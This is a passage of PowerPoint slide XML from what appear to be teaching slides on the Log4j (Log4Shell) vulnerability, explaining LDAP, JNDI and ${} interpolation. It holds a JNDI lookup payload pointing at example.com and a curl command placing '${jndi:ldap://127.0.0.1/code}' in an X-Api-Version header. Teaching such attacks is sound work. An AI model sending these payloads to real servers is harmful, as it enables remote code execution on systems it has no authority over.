        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Straight Arrow Connector 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9E52C2A-4971-D11D-3BD6-E62CC364FFF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4693134" y="3208864"/>
            <a:ext cx="183664" cy="39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FE1C97-2150-6767-2064-D486D09EA6D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7371372" y="4353773"/>
            <a:ext cx="2851151" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>${} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>indicates variable interpolation. It's trying to trick the victim server into interpreting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Straight Arrow Connector 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3868316A-70DE-4C74-D0EA-988151372C4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7831015" y="4096211"/>
            <a:ext cx="0" cy="257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3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26A0-03BF-4D5F-8529-DF8AAAB6E007}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A specific input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>${…} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>using LDAP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B053F55-BE90-DC80-CA1E-5339E65959B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="3488837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LDAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> (Lightweight Directory Access Protocol) server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A specialized type of server used for organizing and providing access to directory information (data storage or authentication)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Another machine can talk to an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LDAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> server through a specific set of rules and methods (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LDAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LDAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> server stores the malicious payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://example.com/malicious_code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LOG4J </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>talks to an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LDAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> server using a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>program interface</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>ava </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>aming and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>irectory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>nterface (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>JNDI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAB01823-D7F6-7945-7A1B-78960BF4AB0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9003103" y="3570043"/>
            <a:ext cx="986180" cy="797519"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C55EA1EF-EA4A-A76A-FEDC-10E9CD767672}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2132499" y="5613679"/>
            <a:ext cx="746825" cy="640135"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B5B821C-F66A-4CD4-8DF1-9A75002DD0C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8081608" y="5534986"/>
            <a:ext cx="986180" cy="797519"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4D68565-41A7-E4F3-F85C-6AC672051F50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3532947" y="5325145"/>
            <a:ext cx="3508714" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>JNDI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://example.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malicious_code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB70DBF6-5B54-0726-C629-030C323CF3CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3232304" y="5994400"/>
            <a:ext cx="4606527"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A450E52-C3C5-74D3-D194-B4F10BF6CCC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2538394" y="6492875"/>
            <a:ext cx="8274551" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>lookup through LDAP protocol and loads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malicious_payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> from the URL example.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="155708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24C7-626E-0FC9-0857-74E6C734CEDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A specific input using an LDAP server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0D5E9EE-AF3B-97A7-F65B-7100CBA0A89C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="1530418"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers manipulate user inputs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>‘’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to inject malicious LDAP queries that are sent to an LDAP server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These queries can modify, disclose, or delete data in an LDAP directory. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C419B23-DE17-334B-7E88-8FD6D5E5229C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="961292" y="3585308"/>
            <a:ext cx="10074032" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="393A34"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="36ACAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="36ACAA"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>7.0.0.1:8080</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="393A34"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -H </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>X-Api-Version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: ${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://127.0.0.1/code}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADFAAB13-B34B-C299-BDD6-CD1CC11A338F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4456474"/>
            <a:ext cx="10167816" cy="1477328"/>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GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://127.0.0.1/code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>is a string that resembles a JNDI (Java Naming and Directory Interface) URL pointing to an LDAP server at 127.0.0.1 (which is the local machine) with a path of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>${} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>indicates variable interpolation,. It's trying to trick the victim server into interpreting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://127.0.0.1/code} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>as code to execute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="195415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CB6A31-098F-0147-5072-D1CD409A82B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1024113" y="0"/>
            <a:ext cx="10143774" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25BDA276-60B9-0528-B5DF-5AB00142DA0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5478584" y="93786"/>
            <a:ext cx="5524269" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007DB5"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Put all the pieces together!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="419056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3812-65CD-7F62-C731-BCFC6FBABFCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
